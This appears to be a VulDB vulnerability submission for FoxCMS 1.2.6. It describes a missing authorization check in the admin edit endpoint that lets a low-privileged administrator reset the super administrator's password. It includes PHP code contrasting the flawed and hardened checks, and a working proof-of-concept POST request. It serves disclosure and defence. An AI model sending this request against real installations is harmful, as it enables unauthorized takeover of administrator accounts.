Submit #818343: QianFox FoxCMS 1.2.6 Improper Privilege Management

Title: QianFox FoxCMS 1.2.6 Improper Privilege Management
Description:

## Vulnerability Title

Logic Flaw: Arbitrary Administrator Password Modification

---

## Vulnerability Type

Improper Privilege Management / Privilege Escalation / Unauthorized Administrator Password Modification

**CWE:**

```text
CWE-269: Improper Privilege Management
```

---

## Vulnerability Location

```text
app\admin\controller\Admin.php:edit()
```

---

## Vulnerability Description

The backend administrator edit method `Admin.php:edit()` contains an improper privilege management vulnerability. Although the method refuses to change the `status` of the administrator account with `id == 1`, it never verifies that the currently logged-in administrator is allowed to modify the target administrator record at all. The target record is selected by the user-controlled `id` parameter, so a normal administrator can craft a request that edits other administrator accounts, including the super administrator account.

By setting `id` to the super administrator's ID and submitting a new `password`, the attacker resets the super administrator's password. This is a typical backend privilege escalation (missing object-level authorization) that lets a low-privileged administrator take over the entire admin panel.

---

## Root Cause Analysis

The `edit()` method has the following security issues:

1. The only restriction is on changing `status` for `id == 1`;
2. It does not verify that the current administrator may edit the target administrator record, i.e. there is no server-side object-level authorization check;
3. Consequently, it does not prevent normal administrators from modifying other administrators, including the super administrator;
4. It applies no permission checks to sensitive fields such as:
   - `password`
   - `group_id`
   - `status`
   - `username`

Because the target record is chosen solely from the request's `id` parameter, a normal administrator can change that parameter and edit arbitrary administrator accounts.
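The check that is missing, as an added illustration (this is not FoxCMS's code; `SUPER_ADMIN_ID`, the field lists and the function names are assumptions made for the example). `flawedCheck()` paraphrases the behaviour the report describes, where only the `status` of account 1 is protected; `authorizeAdminEdit()` shows the object-level and field-level decision that a hardened `edit()` would make before writing anything, with the actor's ID taken from the server-side session rather than the request:

```php
<?php
declare(strict_types=1);

// Added example, not FoxCMS code. It models the authorization decision that
// Admin.php:edit() is reported to lack. SUPER_ADMIN_ID, the field lists and
// the function names are assumptions made for this illustration.

const SUPER_ADMIN_ID = 1;

// Fields an administrator may change on their own account.
const SELF_EDITABLE_FIELDS = ['username', 'password', 'nickname', 'phone', 'avatar'];
// Fields that grant or remove privilege: super admin only, never on account 1.
const PRIVILEGED_FIELDS = ['group_id', 'status'];

/**
 * Paraphrase of the flawed logic the report describes (not FoxCMS's code):
 * the only guard is that account 1's status cannot be changed. Everything
 * else, including the password of account 1, is accepted from any admin.
 */
function flawedCheck(int $targetId, array $changes): ?string
{
    if ($targetId === SUPER_ADMIN_ID && array_key_exists('status', $changes)) {
        return 'forbidden: status of the super admin cannot be changed';
    }
    return null;
}

/**
 * Keep only known fields. Drops `id` and anything else the form did not
 * intend to expose, so the request cannot smuggle extra columns.
 */
function filterFields(array $post): array
{
    $allowed = array_merge(SELF_EDITABLE_FIELDS, PRIVILEGED_FIELDS);
    return array_intersect_key($post, array_flip($allowed));
}

/**
 * Hardened decision. $actorId must come from the server-side session, never
 * from the request. Returns null when the edit is allowed, otherwise a reason.
 */
function authorizeAdminEdit(int $actorId, int $targetId, array $changes): ?string
{
    $isSuper = $actorId === SUPER_ADMIN_ID;

    // Object-level check: may this actor touch this record at all?
    if (!$isSuper && $actorId !== $targetId) {
        return 'forbidden: administrators may only edit their own account';
    }

    // Field-level check on privilege-bearing attributes.
    foreach (PRIVILEGED_FIELDS as $field) {
        if (!array_key_exists($field, $changes)) {
            continue;
        }
        if ($targetId === SUPER_ADMIN_ID) {
            return "forbidden: $field of the super admin cannot be changed here";
        }
        if (!$isSuper) {
            return "forbidden: only the super admin may change $field";
        }
    }
    return null;
}

// Constructed request mirroring the report's PoC: the actor is normal admin
// id 2, the form targets id=1 and carries a new password.
$post = [
    'id'       => '1',
    'username' => 'admin',
    'password' => 'Abc123456',
    'group_id' => '1',
    'nickname' => 'tester',
    'phone'    => '4008883116',
    'avatar'   => '/uploads/files/20230311/user.jpg',
];
$actorId  = 2;                    // from the session, not from $post
$targetId = (int) $post['id'];    // user-controlled
$changes  = filterFields($post);

printf("flawed:       %s\n", flawedCheck($targetId, $changes) ?? 'ALLOWED - password of id 1 is overwritten');
printf("hardened:     %s\n", authorizeAdminEdit($actorId, $targetId, $changes) ?? 'allowed');
printf("self edit:    %s\n", authorizeAdminEdit(2, 2, ['password' => 'N3w-Passw0rd']) ?? 'allowed');
printf("self promote: %s\n", authorizeAdminEdit(2, 2, ['group_id' => '1']) ?? 'allowed');
printf("super edits:  %s\n", authorizeAdminEdit(1, 2, ['group_id' => '2', 'password' => 'x']) ?? 'allowed');
```

Run with `php example.php`: the flawed check lets the PoC request through because it only inspects `status`, while the hardened check rejects it at the object-level step. The two remaining cases show that a normal administrator keeps the ability to change their own password but cannot raise their own `group_id`, and that the super administrator can still manage other accounts. The important design point is that the authorization subject is the session's account, and the authorization object is the record named by `id`; both must be compared server-side on every request, regardless of which menu the UI exposes.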
---

## Affected Endpoint

```http
POST /admin9423.php/Admin/edit
```

Affected feature:

```text
Backend administrator edit function
```

Affected accounts:

```text
All administrator accounts, including the super administrator account
```

---

## Proof of Concept

Log in with a normal (non-super) administrator account and obtain a valid session cookie. Then send the following request with that cookie, setting `id=1`, the ID of the super administrator account:

```http
POST /admin9423.php/Admin/edit HTTP/1.1
Host: target.com
Cookie: PHPSESSID=xxx
Content-Type: application/x-www-form-urlencoded

id=1&username=admin&password=Abc123456&group_id=1&nickname=%E9%BB%94%E7%8B%90%E7%A7%91%E6%8A%80&phone=4008883116&avatar=%2Fuploads%2Ffiles%2F20230311%2Fuser.jpg
```

The session cookie in this request belongs to the attacker's own low-privileged administrator account; no credentials of the super administrator are needed.

---

## Result

![Screenshot of the successful request](https://github.com/user-attachments/assets/c4cdea36-fe41-4d34-9c19-23be6276cfee)

After the request succeeds, the password of the super administrator account is changed to:

```text
Abc123456
```

The attacker can then log in to the backend as the super administrator with the new password, confirming that a normal administrator can change the super administrator's password.

---

## Impact

Successful exploitation may lead to:

1. Modification of arbitrary administrator passwords;
2. Reset of the super administrator password;
3. Complete takeover of the super administrator account;
4. Modification of system configuration and business data;
5. Creation of new high-privileged administrator accounts;
6. Deletion of or tampering with critical backend data;
7. Further compromise of the server if combined with other backend functions such as file upload or template editing.
---

## Severity

Recommended severity: **High / Critical**

Reasons:

- A normal administrator can take over the super administrator account;
- The vulnerability affects the core privilege management mechanism;
- Exploitation requires only a low-privileged administrator account;
- Successful exploitation may lead to full system compromise.

---
Source: https://github.com/QianFox/FoxCMS/issues/3
User: lzihan (UID 97871)
Submission: 03.05.2026 06:35 (1 month ago)
Moderation: 26.05.2026 18:23 (23 days later)
Status: Accepted
VulDB Entry: 365682 [QianFox FoxCMS up to 1.2.6 Admin.php edit privilege escalation]
Points: 20
